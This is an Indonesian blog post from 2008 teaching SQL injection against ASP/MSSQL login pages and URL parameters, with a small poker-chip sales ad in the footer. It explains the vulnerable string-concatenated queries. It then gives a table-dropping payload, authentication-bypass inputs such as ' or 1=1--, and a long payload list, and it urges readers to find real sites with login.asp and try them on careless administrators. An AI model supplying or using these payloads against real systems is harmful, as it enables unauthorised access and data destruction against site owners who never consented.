Social Icons

Pages

Selasa, 23 Desember 2008

Dasar-Dasar SQL Injection


Disini saya cuma akan membahas tentang ASP+MsSql yang udah dicoba pada IIS 5 dan beberapa sql injection pada url.


Biasa Sql Injection dilakukan pada login page pada asp seperti di :


admin\login.asp

login.asp

Jadi yang akan menjadi target itu page tersebut,sekarang kita mulai saja dengan dasar-dasar sql injection :d.

Biasanya di sql statement select id, user_name, password from user

maksudnya perintah diatas menghasilkan data id,user_name dan password pada table user.

Bisanya pada login page dengan mengunakan statment result setnya sebagai berikut :


select id, user_name,password from user where name = 'echo' and password='password'

Pada IIS dan ASP apabila terdapat kesalahan sintax script akan diberi tau dan ditampilkan di browser


Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'jopi' SQL atau "Structured Query Language" seharusnya tidak menyentuh system calls. Tetapi tidak dengan MSSQL. Nah, ga tau kenapa karakter single quote 'breaks out' dari delimiter nya SQL Jadi kalau misal ada inputan


User: echo';drop table user--


dan akibatnya akan fatal , dan artinya adalah kita menghapus table user dan akan kosong deh tuh loginya :D

oh iya '--' merukapan mark nya MSSQL, jadi perintah selanjutnya ga di execute.

Sekarang untuk lebih jelasnya kita secara langsung pada login script seperti input login + password. Nama field nya 'login' dan 'pass'. dan


SQL nya di asp: var sql = select * from users where username='"+login+"' and password='"+pass"'";


coba kalau ada inputan: login: ';drop table users-- pass: chfn (*wink* negative) pasti ke drop tuh table users


Aduh pada pusing ya , gini deh cara gampangnya dan kita lupakan yang diatas :P kita langsung praktek aja>

Coba cari disitus-situs yang menggunakan asp dan MsSql sebagai DB nya, lalu cari


login.asp atau

admin\login.asp.

Kalau udah dapet masukin nich variable sql nya

user: admin

pass: ' or 1=1--

Ingat kita disini hanya coba-coba kali aja dba nya ga pinter :d

atau :

user:' or 1=1--

admin:' or 1=1--

Mas , ga bisa nich gimana ya ?

Inget sekarang rata-rata para admin pada pinter semua , kita cari yg gombol aja deh untuk tes kalau ga lo bisa buat sendiri script dan tes karena saya udah coba buat sendiri dan berhasil tanpa melakukan paket filter pada db nya . Untuk test apakah suatu page mempunyai vulnerable , gini caranya :


Kalian pernah melihat pada halaman-halaman ASP,JSP,PHP dan CGI yang didalam addressnya :

http://vivtim/index.asp?id=10


Selain kita test dengan login page diatas tadi , kita test dalam melakukan sedikit tambahan pada addressnya seperti memasukan : test'1=1--

menjadi http://victim/index.asp?id=test'1=1--

Kita juga bisa juga melakukan xss dengan sql injection ini , coba download source HTML dari page target lalu kita tamhankan hidden field pada source tersebut sebagai contoh :


Apabila beruntung kita akan membuka page tersebut tidak perlu memasukan password dan username.

Ingat script ini ditambahkna pada script yg sudah kalian download dari target .

Variable ' or 1=1--


Mungkin pada bertanya-tanya kenapa mengunakan variable 'or 1=1-- dan sangat penting. Lihat contoh pada sebuah web tertulis http://victim/index.asp?category=laptop


Dalam url tesebut category adalah variable name dan komputer adalah masukan untuk variable name tsb .


Kalau ditulis dalam script ASP maka akan menjadi :


v_cat = request("category")

sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"

set rs=conn.execute(sqlstr)

Data yang kita masukan seperti komputer akan masuk ke dalam v_cat variable dan pada sql statment menjadi


SELECT * FROM product WHERE PCategory='laptop'


lalu apa hubungan dengan 'or 1=1---

coba kalau kita ganti http://victim/index.asp?category=laptop menjadi


http://victim/index.asp?category=laptop'or 1=1--


Kita lihat varible v_cat sekarang menjadi laptop'or 1=1-- lalu dalam SQL query nya

menjadi


SELECT * FROM product WHERE PCategory='laptop' or 1=1--'


artinya v_cat mendapatkan masukan berupa varibale laptop atau var 1=1(kosong) yang menyebabkan Sql Server menjadi bingung dan akan mengeksekusi Select * pada table tsb yang mengakibatkan kita bisa masuk kedalam db teserbut dan db tsb tdk berfungsi :d. Lalu tanda – merupakan mark dari sql untuk ignore semua perintah. Bisa dibayangkan kalau terjadi pada login page

Kita bisa masuk kedalam login page tanpa password dan user name :d.

Kemungkinan-kemungkinan variable lainya adalah:


or 1=1--

" or 1=1--

or 1=1--

' or 'a'='a

" or "a"="a

') or ('a'='a

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a


Selain masuk kedalam page tersebut kita juga bisa memanfaatkannya untuk remote execution dengan sql Injection



Baca juga artikel menarik lainnya :

0 komentar:

Poskan Komentar

 
Jual Chip Poker Paket ID
25M = Rp. 75.000
50M = Rp. 140.000
100M = Rp. 250.000

Kontak Person:
YM = adriantojusuf
SMS Only = 081244438282
Info lengkap..!